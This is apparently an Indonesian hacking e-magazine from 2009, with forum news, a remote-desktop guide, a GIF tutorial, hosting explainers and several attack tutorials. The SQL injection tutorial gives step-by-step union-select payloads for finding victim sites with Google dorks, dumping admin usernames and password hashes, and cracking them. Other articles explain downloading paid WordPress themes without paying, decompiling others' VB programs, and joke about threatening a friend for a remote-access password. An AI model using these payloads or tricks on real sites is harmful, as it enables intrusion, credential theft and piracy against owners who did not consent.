Hacker Emagazine Vol.1 - 2

www.hackers-center.
org
Decompiler VB Hal 12 SQL Injection Basic Hal 14 WooThemes Hack Hal 20 Virus Section Hal 30 Guitar Pro 5.2 Demo Hal 36 XSS Attack Hal 46
- 1-
HC eMagazine Spirit # 01
HC eMagazine
HC eMagazine..? HC eMagazine adalah majalah elektronik komputer, internet, hacking dan coding berbahasa Indonesia yang dibuat oleh staff dan member HC dengan format PDF. Latar Belakang HC eMagazine : Makin banyaknya kebutuhan akan informasi dunia teknologi komputer dan internet membuat HC menjadikan komunitas baru di dunia internet yang menyediakan bahan referensi dalam dunia cyber khususnya hacking sehingga para pecinta internet tidak tertinggal informasi. Tujuan : Share and Learning adalah moto HC dengan tujuan semua orang dapat berbagi ilmu dan belajar dari ilmu yang didapat. Serta memberikan pencerahan terhadap dunia Teknologi Informasi khususnya Hacking dan Security. Misi : Menyebarkan ilmu-ilmu komputer, internet dan hacking untuk tujuan Positif hanya untuk pengetahuan dan tidak untuk disalahgunakan. Hak Cipta : Seluruh isi yang ada di HC eMagazine adalah sepenuhnya milik penulis, HC hanya sebagai media berbagi ilmu dan HC Magazine ini dapat di download dengan GRATIS dan boleh menyebarluaskan dengan bebas dengan tujuan Non-Profit. Distribusi HC Magazine : - HC Magazine Dapat di download secara resmi di www.hackers-center.org - Website staff dan member HC - Serta media-media pendukung yang bekerjasama dengan HC Contact HC Magazine : - Administrator (admin@hackers-center.org) - ciebal (ciebal745@gmail.com)
Hackers-Center 2009 HC eMagazine Vol. 01
- 2-
Editorial
Hackers-Center Perjuangan
Forum Hackers Center atau selanjutnya disebut Forum HC adalah sebuah sarana untuk berbagi dan belajar. Forum ini berbentuk komunitas dan dibentuk oleh komunitas serta ditujukan untuk semua kalangan yang ingin belajar dan berbagi utamanya dalam hal komputer dan internet. Nama Hackers Center sendiri adalah usulan dari komunitas yang pada awalnya bergabung untuk berbagi pengalaman dan sharing mengenai dunia komputer dan sekitarnya. Pada awalnya berdirinya forum ini adalah sebuah forum personal yang dibangun oleh ANDRE aka NeckLord dan beberapa teman yang lainnya. Forum awal bernama andresite.us yang dibangun sekitar tahun 2006. Saat itu hanya beberapa orang dekat yang bergabung, dan belum aktif seperti sekarang. Andresite berjalan kurang lebih 1 tahun. Kemudian ada masalah dengan penyedia hostingnya sehingga andresite.us tutup. ANDRE sebagai pencetus dan dengan beberapa rekan yang lainnya sepakat untuk membentuk komunitas baru dan diberi nama Hackers Center. Awalnya forum ini ada di sebuah penyedia layanan forum gratisan. Alamatnya hackerscenter.informe.com dan sempat berjalan selama kurang lebih 1 tahun juga hingga akhirnya mempunyai domain dan hosting sendiri. Kru yang menggawangi HC Informe masih kurang lebih sama dengan andresite.us dan ditambah beberapa moderator baru termasuk saya. Pada awal 2007, team ADMIN berkoordinasi untuk mengupayakan domain dan hosting sendiri buat kemajuan forum. Hingga akhirnya pada April 2007 dipilihlah sebuah domain atas hasil polling. Domain inilah yang sampe sekaran dipergunakan. HC adalah milik komunitas HC sejak pertama kali berdiri. HC dibangun dengan asas kebersamaan agar semua members dan non members dapat saling berbagi dan belajar bersama tanpa kecuali baik dari suku apapun, ras apapun, agama apapun, bangsa apapun dan sebagainya. Kami sebagai para Administrator, Moderator, Contributor dan penggiat berbagai kegiatan hanya fasilitator untuk mengatur agar semua dapat berjalan baik dan optimal untuk members dan semua masyarakat IT di Indonesia. Trims, Andre S Hackers Center Community
Administrator NeckLord UnderDOS Viper Nobita HC Moderator Ramz ArminVanBuuren Equal Jackzard Kotaro Spiderman ciebal nicx Contributor metropilix root agitama pass_word 4L13N general_nagabonar HC eMagazine Writer ciebal pass_word Xyberbreaker metropolix ramz root Nobita HC eminem EiGhtTailz omicron9194 Equal Contact Kirim Artikel ciebal745@gmail.com Kritik dan Saran admin@hackers-center.org Download HC eMagazine www.hackers-center.org forum.hackers-center.org All Supported Us
- 3-
/Dir
Hot News - Situs phpBB.com Under attacker hal.4 Hot News Defacer kena Deface hal.5 Do You Know..? Apa Adsense itu..? hal.6 Show My PC Mengontrol PC dari jarak jauh hal.7 Nature Illusion Studio Membuat image berjalan di desktop hal.9 Decompiler VB Membajak Aplikasi yang dibuat dengan VB hal.12 SQL Injection Basic Tutorial Konsep dasar SQL Injection hal.14 USB WiFi TP-Link Menggunakan Antena Eksternal hal.18 WooThemes Hack Mendapatkan theme WP premium dari WooThemes hal.20 Web Hosting Penggenalan Sub Domain, Parked Domain dan Add-on Domain hal.23 SQL Injection by Xyberbreaker Membobol situs perguruan tinggi hal.25 IP Command Mengenal IP Command pada CMD hal.28 Virus Section Knowledge, History, Type of Virus, etc hal.30 Guitar Pro 5.2 Demo Version Cracking Software Guitar Pro hal.36 Advanced SQL Injection Test On Windows XP hal.42 XSS Attack Deface Web Tanpa Merusak hal.46 Phising Attack Pengenalan dan Pencegahan hal.50 Bedah Web With Schemafuzz SQL Injection Dengan Metode Schemafuzz hal.53 Instalasi Ubuntu 8.10 Migrasi dari Windows ke Linux hal.60 HC eMagazine Writer Ketentuan Menjadi Penulis HC eMagazine Lampiran Serba-Serbi HC eMagazine
- 4-
Hot News
Berita Seputar Teknologi Informasi
Present By : Redaksi HC eMagazine
Situs phpBB.com Under Attacker

CALIFORNIA - Situs milik salah satu penyedia layanan open source bulletin boards terbesar di dunia, phpBB, berhasil diterobos hacker. Akibatnya, sebanyak 400.000 username, alamat e-mail, dan password bocor. Seorang peretas berhasil memperoleh akses ke database forum dan mailing list dengan memanfaatkan lubang di peranti lunak newsletter PHPlist. Demikian seperti dikutip dari Softpedia, Sabtu (7/1/2009). PHP Bulletin Board, yang lebih dikenal dengan phpBB, adalah salah satu aplikasi yang paling banyak dipakai untuk mengelola forum online. Software ini berplatform open source dan dirilis di bawah GNU General Public License, yang sepenuhnya gratis. Layanan ini dibuat dalam PHP dan mendukung delapan backends SQL yang berbeda. Hingga tulisan ini dibuat, situs phpBB.com masih offline. Begitu juga dengan situs-situs lain yang terkait juga belum aktif. Sebuah pengumuman dibuat saat situs tersebut dikunjungi: "We are sorry to report that we have been attacked through a vulnerability in an outdated PHPList installation. phpBB.com and related sites will remain unavailable while we work to recover. No vulnerabilities have been found in the phpBB software itself." Situs pusatnya saja bisa di susupi hacker, apalagi ribuan situs yang menggunakan phpBB di dunia. Jika tidak cepat-cepat di update maka ini merupakan ancaman yang cukup serius bagi pengguna phpBB. Sumber : techno.okezone.com
- 5-
Hot News
Berita Seputar Teknologi Informasi
Defacer kena Deface
Entah apa yang sebenarnya terjadi dengan situs gorontalodefacer.org ini, yang jelas redaksi diberitahu oleh seseorang bahwa situs defacer yang cukup terkenal ini terkena deface. Dari sumber yang ada terjadi simpang siur, tentang siapa yang mendeface situs ini, entah itu dari orang dalam, orang malaysia, dll. Ramai sekali didiskusikan di salahsatu forum hacker indonesia. Sampai administrator (EA Ngel, nick di echo. Red) ikut bicara soal ini katanya Cuma meluruskan aja. Ak EA Ngel salah satu Admin GorontaloDefacer tdk keberatan site kita kena deface, karena dgn ini kami [GDC] bisa mengetahui kelemahan [bug / hole] site kami dan kami sangat berterima kasih pada Xhimes. Soal Xhimes adalah sahabat dari salah satu admin GDC, itu emank benar. Dikutip dari echo. Tapi sampai saat tulisan ini ditulis (06/03/09) situs itu masih off, katanya sih masih terjadi masalah sehingga belum bisa ON. Ini menandakan begitu besarnya resiko yang terjadi di dunia maya. Tidak ada yang aman di dunia maya. (-Red)
- 6-
Do You Know..?
Sebaiknya Anda Tau..
Apa Adsense itu..?

Singkatnya Adsense adalah layanan iklan milik Goggle. Google Adsense menyediakan bermacam-macam iklan yang nantinya bisa di pasang di website kita sesuai kategori iklan yang bisa kita sesuaikan dengan tema blog kita. Untuk memasang iklannya, kita tidak perlu membuat sendiri dan menyediakan server khusus. Anda cukup menyediakan space atau ruang kosong untuk iklan dan menyispkan kode javascript yang diberikan Google. Tentunya space iklan yang ada di blog kita harus strategis agar para pengunjung dapat melihat iklannya dengan mudah dan nyaman. Untuk Apa Iklan itu dipasang di blog kita..? Adsense memberikan kesempatan kepada anda untuk mendapatkan penghasilan tambahan dengan memasang iklan yang disediakan oleh google. Anda akan mendapatkan bayaran untuk setiap iklan yang di klik oleh pembaca situs. Apa hanya dengan meng-klik saja? Ya, cukup dengan meng-klik saja, otomatis anda akan mendapatkan sejumlah uang yang nilai bagiannya diperhitungakn dari beberapa bid yang telah ditentukan oleh si pemasang iklan (advertiser). Meskipun ada factor lain yang mempengaruhinya, secara umum bagian yang diperoleh publisher adalah 20% dari niali bid. Berarti kita bisa meng-klik iklan kita sendiri dengan terus menerus agar cepat mendapatkan uang? Ya silahkan saja jika anda berani dan tidak ketahuan dengan pihak pengelola iklan, karena secara peraturan itu merupakan tindakan yang tidak diperbolehkan dan sanksi untuk itu adalah dari mulai penghasilah anda di hapus sampai akun anda yang di baned. Bagaimana Pembayarannya..? Pembayaran akan dilakukan 30 hari setelah total pendapatan anda dalam satu bulan mencapai minimal $100. Kalau saya dalam satu bulan tidak mendapatkan $100 bagaimana..? Jangan khawatir, jika dalah satu bulan pendapatan anda tidak mencapat $100 karena itu dihitung kumulatif. Jadi jika bulan januari anda mendapatkan $30 dan februari $80, maka cek akan dikirimkan pada akhir bulan maret. Untuk wilayah Indonesia, pembayaran akan dikirim dalam bentuk cek dan anda dapat memilih untuk menggunakan jasa pos ataupun DHL (Wxpress Delivery) dalam proses pengiriman cek tersebut. Jika menggunakan jasa pos, waktu pengiriman biasanya paling cepat adalah 20-25 hari. Sedangkan jasa DHL cek akan anda terima dalam waktu 2-3 hari kerja. Tapi ada biaya tambahan unuk jasa ini sebesar $24. Biaya ini otomatis akan dipotong dari pendapatan anda. Referensi : http://groups.google.co.id/group/give-up/
- 7-
Show My PC
Mengontrol PC dari Jarak Jauh
Writer : ciebal (ciebal@mugi.or.id)
Kali ini gw coba sharing sedikit pengetahuan gw yang gw dapatkan ketika chat dengan salah satu moderator HC yang anak SMK Telkom, hehehe.. Dya yang kasih tau gw tentang hal ini dan gw coba untuk menulisnya. (Sori ya Ramz, bisnya lo ngontrol PC gw gak bilang-bilang) OK gak perlu basa-basi lagi, ikuti caranya sebagai berikut : download App-nya di 1. Silahkan http://www.showmypc.com ukuran file tidak lebih dari 2MB. Lalu jalan kan App itu di computer lo (akan terlihat seperti ini)
3. Suruh temen lo untuk meng-generate Passwordnya dengan cara meng-klik tombol Show My PC Now maka secara otomatis App ini meng-generate Password yang bisa lo gunakan untuk mengontrol PC temen lo itu. (Lihat gambar)
4. Jika temen lo sudah sukses menggeneratenya maka suruh temen lo untuk mengirimkan passwornya ke lo. (Klo gak mau paksa aja, klo gak ancem aja klo lo bakal rusakin system computernya klo gak kasih passwornya) hahaha.. 5. Setelah lo dapatkan passwordnya sekarang giiliran lo untuk bekerja! Sekarang klik tombol View Remote PC lalu show my pc akan meminta password, masukan password yang temen lo kirim itu.
2. Lalu ajak temen lo menjalankan App itu juga sehingga masing-masing computer telah terpasang App yang sama. (Ok gw anggap App dah terpasang yah)
- 8-
7. Sekarang terserah lo! Mau kamu apakan PC temen lo itu. Gw rasa udah cukup jelas, jika mendapatkan kesulitan silahkan hubungi saya atau diskusikan di forum. Terimakasih mohon maaf klo tulisan ini dianggap kurang. Wassalamualaikum
6. Tunggu deh sampai proses koneksi selesai, gak akan lama kok kurang dari 1 menit. Jika koneksi failed ulangi lagi sampai berhasil.
Referensi : Hasil pengalaman dan Chat dengan RamzHC /Nick : ciebal /Location : Banten - Bandung /Email : ciebal745@gmail.com or ciebal@mugi.or.id /Web: www.my-ciebal.co.cc
- 9-
Nature Illusion Studio

Membuat Image Berjalan di Desktop
Writer : pass_word (luthfi_tech@yahoo.com)
Artikel ini awalnya kebosanan gw karena desktop hanya tampilan gambar mati 2D, hari gini masih 2D apa kata dunia. Langsung aja mulai, Tahu kan ekstensi image yang dapat bergerak yaitu *.gif , nah kali ini gw ingin mencoba berbagi ilmu membuat image *.gif dengan mudah, cepat, dan pasti dengan hasil yang bagus. Proses pembuatan nya menggunakan software nature illusion studio, software ini dapat menghasilankan screenserver dan aplikasi, movie, dan gif. Yang gw bahas disini hanya yang gif. Yang di perlukan: - Image (*.jpg, *.bmp, atau *.gif), - Software nature illusion studio Download: http://www.4shared.com/file/84705473/8dca12f8/NatureIllusionStudioProfessionalv180017.html (4952KB) Mirror: http://rapidshare.com/files/194595746/Nature.Illusion.Studio.Professional.v1.80.0.17.rar.html (5071KB) - windows XP (belom dicoba bila di OS lain), - segelas kopi susu yang ditemani oleh 1 bungkus rokok (ajibb). ok pendahuluan nya selesai, TAHAP TAHAP PEMBUATAN : 1. download nature illusion studio -> install -> masukkan serial number nya, 2. jalakan nature illusion studio -> new -> load image (pilih image lo), tampilan setelah tahap ke 2
- 10- HC eMagazine Spirit # 01
membuat *.gif
effect
3. Berikutnya gw akan memberi effect pada image, disini gw memakai effect yang membuat api berkobar, agar terasa hangat ( pura-pura nya), caranya: Lihat tanda panah effect klik preset -> load -> fire/fog/smoke ->goreskan pada api di image, Untuk bayangannya, gw memakai effect watter ripple, agar terlihat berada di air. 4. Sekarang melihat hasil nya, klik (preview), 5. Ok sekarang tinggal menjadikan gambar menjadi gif, Klik build gif -> custom -> setting size = 1024 x 721 dan water speed = max -> create -> save,
6. Jadikan image gif tersebut menjadi desktop lo, ga terlalu terlihat kl disini hasil nya, dicoba aja dan dikembangkan.
OK, sekian dulu semoga dengan ini membuat lo gak jenuh lagi dan selalu berkreasi.. Wassalam
Created by: pass_word a.k.a bagong Email : luthfi_tech@yahoo.com YM : bagong_ipb1 THANX TO : ALLAH SWT, WARNET VINET CREW, ALL STAFF n MEMBER HACKERS-CENTER, EMINEM (account shutterstock nya makasih).
Decompiler VB
Membajak Aplikasi yang dibuat menggunakan VB
Alhamdulillah, pada kesempatan kali ini gw coba berbagi sedikit pengetahuan gw lagi tentang computer dan tidak lain dengan tujuan sharing bukan berniat menggurui. Mungkin temen-temen dah pada tau apa arti decompiler, singkatnya decompiler kebalikan dari compiler yang artinya kebalikan dari menggabungkan dan pasti kalo dah baca tulisan ini pasti ngerti deh.. So baca terus yah.. Pertama yang mesti lo siapin adalah (seperti biasa) Software decompiler yang cukup terkenal dan cukup mudah di gunakan yaitu VBReformer (lo bisa cari decompiler lain yang menurut lo mudah, tapi sekarng yang gw bahas adalah VBReformer). Download softwarenya di http://www.decompiler-vb.net/ dan sebelumnya lo mesti daftar dan Sign In dulu untuk mendownloadnya (Jangan lupa pilih yang Free Edition) KLo punya duit sih beli yang premium. :P OK, gw anggep lo dah download dan sekarang Install software seperti biasa. Setelah install
maka akan terlihat tampilan utama yang simpel seperti ini :
Ok, sebagai contoh gw ambil App yang dibuat dengan VB oleh sto jasakom. Untuk mencari filenya, klik File >> Open >> Pilih file .exe yang telah di compiler dengan VB. Sebagai contoh gw pilih App Seni Internet Hacking yang dibuat oleh Sto Jasakom. (setelah pilih file aka nada warning, tapi jangan khawatir klik continue aja)
Screenshot di atas adalah file App yang digunakan untuk menonton Video Seni Internet Hacking yang dibuat oleh Sto. Q : Bagaimana untuk mengubah file itu..? A : Gampang kok, sekarang lo tinggal Klik File >> Save Project As >> pilih tempat dimana lo mau nyimpen project itu.
Sekarang lo bisa edit semau lo dan dengan desain lo sendiri.
Q : Tapi kok gw coba decompiler AVG, Transtool, Photoshop, dll gak bisa..? A : Wedew, gak semua file .exe bisa jadi lo coba-coba aja semua file berekstensi .exe OK, gw rasa dah cukup jelas sampai sini apabila masih ada kesulitan silahkan hubungi gw selagi gw bisa bantu (tapi klo gak bisa bantu maaf ya, gw juga baru belajar). Semoga dengan ini lo bisa mendapatkan inspirasi untuk membuat suatu program dengan VB, tapi inget kita disini bukan untuk menjadi Plagiator so jadikan tulisan ini sebagai ilmu pengatahuan belaka. (sok alim deh gw) xixixixi..
Sekarang lo dah punya project VB yang bisa lo edit di Software Pemrograman VB 6 atau bahkan VB 2008. (rada rumit di VB 2008) :P Pasti dah gak asing kan App ini..?
/Nick : ciebal /Location : Banten - Bandung /Email : ciebal745@gmail.com or ciebal@mugi.or.id /Web: www.my-ciebal.co.cc
SQL Injection Basic Tutorial

Konsep Dasar SQL Injection
Writer : Metropolix (metropolix@live.net) Nah.. sebelumnya kita cari tahu dulu nih pengertian sql injection ok! Searching searching di paman Google.., nah.. dapat deh rangkumannya. He..he..he.. Yup, SQL injection adalah sebuah aksi hacking yang sering dilakukan di aplikasi client dengan cara memodifikasi perintah SQL yang ada di memori aplikasi clien dan juga merupakan teknik mengeksploitasi web aplikasi yang didalamnya menggunakan database untuk penyimpanan data.Wew..(lengkap ya bro andrea Copas lo yah?? Tau ajah,,wakakakakka.) Macam-macam Perintah SQL injection: Karakter: , comments: /*,-information_schema untuk versi: mysql versi 5.x , tidak dukung untuk mysql versi 4.x (menurut gw) allinurl: news.php?newsid= inurl: /berita.php?id= (atau dengan dork yg lain juga bisa.. tergantung kreatifitas kamu.) 1. Tahap Pertama Cari korban di paman Google.. Anggap saja kali ini target kita [website]/berita.php?id=20 Tambahkan karakter ' pada akhir url atau bisa juga dengan menambahkan karakter "-" untuk melihat apakah ada pesan error. contoh: [website] /berita.php?id=20' atau [website] /berita.php?id=-20 Apabila kira-kira ada pesan seperti ini You have an error in your SQL syntax. Berarti terdapat bugs dalam web nya.
2. Tahap Kedua
Sekarang kita mulai mencari dan menghitung jumlah table yang ada di dalam Databasenya. Dengan melakukan Perintah: order by Contoh: [website] /berita.php?id=-20+order+by+1-- atau [website] /berita.php?id=-20+order+by+1/* Kita coba satu persatu untuk menebaknya.. misal: [website] /berita.php?id=-20+order+by+1- [website] /berita.php?id=-20+order+by+2- [website] /berita.php?id=-20+order+by+3- [website] /berita.php?id=-20+order+by+4- Lakukan terus sampai hilang pesan erornya..( kalau gak hilang-hilang pesan erornya gmn bro andrea??.. Artinya Comp loe yg eror..wakakakka) Contoh: [website] /berita.php?id=- 20+order+by+4 Nah.. pesan eror nya hilang di angka itu.Berarti yang kita catat adalah sampai angka 4. Menjadi [website] /berita.php?id=-20+order+by+4
3. Tahap Ketiga
Sekarang kita akan mengeluarkan angkanya dengan melakukan perintah: Contoh: [website] /berita.php?id=- 20+order+by+1,2,3,4 Cilukba. Keluarlah angkanya.. anggap saja kali ini angka yg keluar adalah angka 3 dan angka di bawahnya angka 4. Yup,dibagian itulah web tersebut bisa kita cari username admin dan password sang admin.Liat angka pertama.. angka 3., Untuk Mengetahui Versi SQL nya,gunakan perintah version() atau @@version,dan masukkan di angka yg keluar tadi. Contoh: [website] /berita.php?id=-20+union+all+select+1,2,version(),4atau [website] /berita.php?id=-20+union+all+select+1,2,3,@@version,4 Liat versi yg digunakan admin,apabila versi 4 kita lupakan saja dan cari target yang memakai versi 5. Kalau versi 5 berarti kita beruntung tak perlu menebak table n column seperti ver 4 karena di ver 5 ini bisa menggunakan perintah From+Information_schema.
4. Tahap Keempat
Untuk menampilkan table yang ada pada website target kita dengan melakukan perintah: Group_concat(table_name) >>> dimasukan pada angka yg keluar tadi +from+information_schema.tables-- >>> dimasukan setelah angka terakhir Contoh: [website] /berita.php?id=20+union+all+select+1,2,group_concat(table_name),4+from+information_schema.tables Akan keluar isi-isi table databasenya.
5. Tahap Kelima
Zzzzzini tahap yang menyebalkan menurut gw,karena disini dibutuhkan kesabaran yg tinggi. (ceilehh.. bahasanya.. wakakaka) Ok,,kita cari tahu table yang mengandung username admin dan passwordnya. Kita cek satu persatu per satu isi table nya,, karna table-table database itu masih bentuk ascii kan ga bisa di baca...maka harus di convert ke hex dulu.cari di google website buat mengkonversinya. Nih ada contoh tools nya: http://andrea-metropolix.com/tools/ascii.html http://www.dolcevie.com/js/converter.html http://www.industrialtrainer.com/Unicode.shtm Contoh kata yang ingin di konversi yaitu admin dan bentuk hex nya ada 61646D696E.
Kita lanjut cari data table yang mengandung username admin sama passwordnya,,okeh!! group_concat(column_name) >> dimasukkan pada angka yang keluar tadi. +from+information_schema.columns+where+table_name=0x[hasil dari +convert ascii-hex]-- >> ditambahkan pada angka terakhir. Contoh: [website] /berita.php?id=20+union+all+select+1,2,(group_concat(column_name),4+from+information_schema.columns+where +table_name=0x61646D696E Dari situ kita akan dapat isi-isi tablenya.. missal isi tablenya: user,username,password.
6. Tahap Keenam
Tahap terakhir ini kita akan mencoba mengeluarkan isi data table tadi,masukkan kedalam column_name dengan perintah: group_concat(0x3a,username,0x3a,password) >>>> dimasukkan pada angka yg keluar tadi. +from+admin-- >>>> dimasukkan pada angka terakhir. Dan Akhirnya Cilukbaaa!! keluarlah username admin dan passwordnya.. Contoh: admin: fdfbe5666d7cd46517daeef2ba28fbb2. Username: admin Password: fdfbe5666d7cd46517daeef2ba28fbb2 Tinggal cari halaman login adminnya dan selesai. :D Hmmm.. kok gak bisa login nya ndre?? Itu artinya passwordnya di enscrypt pakek MD5,cari aja crack online nya di google, atau di mIrc banyak kok Bot buat nge Crack MD5. Happy hunting .!! OK yah semua.. sampai sini dulu tutorial saya mengenai dasar SQL injection. Sebenarnya masih banyak lagi cara yang bisa di gunakan,tergantung kreatifitas kamu. Mohon maaf jika ada kekurangan dalam tutorial ini.,saya sendiri masih sangatlah newbie dan masih butuh bimbingan.
~ Salam hangat metropolix
Spesial Thanks
Hackers-Center , Balikita ,Yogyafree , Gorontalo Defacer
T UnderDos T Coco_n4kal T tukulesto Tgblack T bl4ck_3n91n3 TOkacybernet T crazydavinci T T Ramz TAgitama Tmamet-tossa T tucker Tindomie T =============================================================== ===============================================================
USB WiFi TP-Link

Menggunakan Antena External
Writer : root (chepoek_agie@yahoo.com) Bagi yang memakai USB type ini kemungkinan agak kecewa bila dibandingkan dengan merek lain. Nah disini kita coba untuk mengoptimalkan perangkat ini dengan cara menambahkan antena kecil 1/4Lambda di luar chassingnya. Bahan yang digunakan untuk tambahan antena harus memenuhi untuk standart frequency, yang artinya ga sembarangan tembaga / kabel bisa dipergunakan. Di percobaan kali ini kita pakai bekas antena HELICAL / bawaan dari radio merek EDIMAX, JAHT, MINITAR, LINKSYS, dll yang biasanya tidak dipergunakan lagi karena radio tersebut sudah dipasang di outdoor memakai antena external GRID, OMNI, ataupun SEKTORAL. Antena HELICAL tersebut kita pergunakan kabelnya aja yang ada di dalam, jadi kita terpaksa bongkar antenanya sehingga mendapatkan kabel COAXIAL beserta pipa GROUND, dalam proses ini perlu ketelitian dan penuh hati-hati supaya kabel COAXIALnya tidak rusak atau putus. Setelah mendapatkan apa yang kita cari maka barulah kita bongkar chassing USB TP-Link dengan dicutter di bagian pinggir. Di dalam rangkaian akan kelihatan pada bagian ujung ada semacam antena panel berukuran mini yang terbuat dari jalur tembaga di PCB. Potong jalur antena tersebut dengan cutter yang mengarah pada capasitor, hati-hati juga dalam melakukan hal ini, kalau tidak kelihatan wajib memakai kaca mata atau kaca pembesar. Sewaktu memotong jangan terlalu dalam, hal ini dimungkinkan agar di dalam PCB ada tidak jalur lain yang ikut terpotong. Lubangi samping chassing untuk memasukkan kabel COAXIAL yang kita dapat tadi, kelupas bagian pangkal kabel kira-kira 5mm, masukkan kedalam lubang tadi dan solder bagian tengan kabel ke capasitor paling ujung. Untuk bagian serabut solder juga pada ground jalur PCB. Tutup kembali chassingnya dan tetesi dengan lem Alteco sedikit saja. Bengkokkan antena external tadi sesuka yang anda mau. Test untuk scanning sinyal dan bedakan perubahan yang terjadi dengan sebelum anda kasih antena external ini. Lebih baik untuk chipset dikasih heat sink sekalian, karena biasanya chipset USB WiFi cepat panas yang mengakibatkan umurnya tidak bertahan lama.
Setelah hasilnya memuaskan barulah project selanjutnya kita pasang USB WiFi tersebut tepat di depan reflektor parabola, entah mau pakai WAJAN, ASTRO Disc, INDOVISION Disc, bahkan PARABOLA besar 9feet sekalipun.
root@HC A.K.A chepoek chepoek_agie@yahoo.com
WooThemes Hack
Mendapatkan Themes WP Premium dari WooThemes
Hi, All.. Moga gak bosen yah dengan gw, sekarang gw mau coba berbagi sedikit trik bagaimana mendapatkan themes premium Wordpress milik Woothemes tanpa membelinya. Hari gini themes aja masih beli ? :P OK Langsung menuju TKP, buka www.woothemes.com nanti akan muncul halaman seperti ini :
Sekarang lo pilih themes yang lo inginin, (yang ada tombol Buy)
Gw anggap lo milih themes dengan nama Crushy, OK? Sekarang kita mulai.. Coba lo arahkan mouse lo kea rah tombol Buy this thems lalu lihat di status bar >>
Perhatikan URL-nya yaitu : http://www.woothemes.com/my-downloads/xxxxxxxxxxx yang gw kasih tanda xxxxxxxx itu adalah URL target kita. Sekarang lo mau download theme bernama Crushy lalu masukan URL menjadi www.woothemes.com/my-downloads/cushy.zip
Lalu apa yang terjadi..?
Inilah hasilnya. Themes Premium dari Woothemes dengan mudah kita download tanpa bayar dan tanpa mengahabiskan waktu lama.
Intinya adalah pada URL www.woothemes.com/my-downloads kita hanya menambahakan nama dari themes tersebut, kalau tadi contohnya adalah theme cushy maka tambahkan dibelakangnya cushy.zip. Simpel kan..? Kalau mau liat themes dari WooThemes, bisa liat blog gw (www.my-ciebal.co.cc) itu yang gw pake theme premium dari WooThemes .Sekarang lo bisa download tuh theme sepuasnya.. hehehe.. Sampai disini dulu deh, dah ngabisin berapa halaman neh Cuma buat ini aja. Makasih
Web Hosting
Nggak ngerti apa itu Sub Domain, Parked Domain, n Add-on Domain?
Writer : Nobita HC (echo_boytra@yahoo.com) Sebelum memulai artikel ini. Gue mau ngucapin dulu terima kasih karena telah diberikan kepercayaan untuk membuat sebuah artikel yang mungkin nantinya dapat berguna buat teman2 semuanya. N gue juga minta maaf kalau hanya bisa membuat artikel yang sangat sederhana seperti ini. Ok, jangan basa basi lagi (entar malah gak enak ). Langsung aja masuk pada pokok permasalahan. N ada satu lagi yang gue mau tekankan... Artikel ini khusus yang belum pada tau aje ye...!!! kalau yang sudah tahu mohon koreksinya. Sub Domain Untuk istilah yang satu ini sangat sederhana. Gue langsung contohkan, loe pasti sangat kenal n ingat dengan alamat situs hackers-center.org . Nah alamat yang diberi warna merah (hackers-center) itu disebut Domain sedangkan .org itu adalah TLD (Top Level Domain) yaitu akhiran dari suatu domain yang menunjukkan status organisasi. Eh, tapi tunggu dulu, kan yang lagi dibahas ini sub domain, kok malah bahas domain... . Loe nggak perlu khawatir broo... soalnya bahasan kita ini saling berhubungan. Kalau loe sudah paham dengan domain maka untuk mengartikan sub domain sangatlah mudah. Sebagai contoh gue mau membuat sebuah direktori yang akan mengakses ke hackers-center.org/forum nah untuk mempermudah akses gue akan membuat sebuah sub domain forum.hackers-center.org, nah forum itu adalah sub domain dari hackers-center.org. Contoh lain yang sederhana adalah buku. Dalam buku pasti terdiri dari Babbab nah dalam Bab tersebut pasti terdapat sub bab, n sama kayak domain, forum.hackers-center.org adalah contoh dari sub domain tersebut. Untuk membuat sub domain ini biasanya tergantung hosting dan paket yang Loe pilih. Ada paket yang sudah tersediah bahkan ada pula yang harus memilih paket yang lebih mahal. Parked Domain Nah berbedah dengan sub domain. Parked domain ini dapat diartikan menggabungkan beberapa alamat domain untuk mengakses satu data hosting yang sama. Atau kalau digambarkan diforum yaitu mempunyai banyak nickname tapi orangnya ya satu itu doank... . Kayaknya penjelasan gue diatas belum begitu jelas nih.... Ok gue akan gambarkan seperti ini. Loe mempunyai dua nama domain yaitu situsgue.com dan situsgue2.com. Nah kedua domain ini akan mengakses data web yang sama. Jadi gini, kalau loe ketik situsgue.com maka akan tampil halaman
situsnya dan kalau loe ketik situsgue2.com juga akan tampil situs yang sama dengan situsgue.com. Karena kedua domain tersebut mengakses satu data situs. Sama halnya dengan sub domain. Terkadang untuk mendapatkan fasilitas ini Loe harus membayar lebih mahal supaya mendapatkan fasilitas parked domain. Add-on Domain Pembahasan yang terakhir adalah Add-on Domain. Dimana Add-on Domain ini berbeda dengan Parked Domain yang telah dibahas sebelumnya. Perbedaannya adalah kalau Add-on Domain yaitu Loe benar-benar mempunyai dua buah atau lebih situs dengan dua buah atau lebih alamat domain. Namun masih dalam satu paket hosting yang sama. Contoh loe mempunyai situs utama dengan alamat warunggue.com. Kemudian loe beli lagi satu domain namun tidak dengan paket hostingnya. Jadi loe mau meletakkan domain ke dua tadi ke dalam server hosting situs pertama. Untuk itu loe dapat menggunakan fasilitas Add-on Domain, dan loe dapat meletakkan isi situs yang baru ke dalam direktori warunggue.com/situsbaru. Dan pada saat orang mengakses alamat domain loe yang baru maka yang akan tampil adalah data dari direktori warunggue.com/situsbaru. Namun pada kotak addressbar browser yang tampil tetap alamat domain yang baru bukan direktori dari warunggue.com/situsbaru. Kemudian sama halnya dengan sub domain dan parked domain. Terkadang untuk mendapatkan fasilitas ini Loe harus membayar lebih mahal supaya mendapatkan fasilitas Add-on Domain. Ok, gue rasa untuk artikel ini gue cukupin aja dulu..!!! Maaf kalau artikelnya sederhana n kurang jelas. Serta gue juga minta maaf kepada semua teman-teman karena gue jarang online. Maklum banyak faktor n penyebab yang tak dapat gue jelaskan satu-persatu. Namun jika teman-teman ada pertanyaan dapat bertanya langsung ke email gue. (Nobita adalah salahsatu admin HC, Red) Referensi : Pengalaman pribadi /Nick /Location /Email /Web : Nobita HC : Palembang Sumatera Selatan : echo_boytra@yahoo.com : www.marping.web.id | www.warunggue.com
SQL Injection by Xyberbreaker

Membobol Situs Perguruan Tinggi
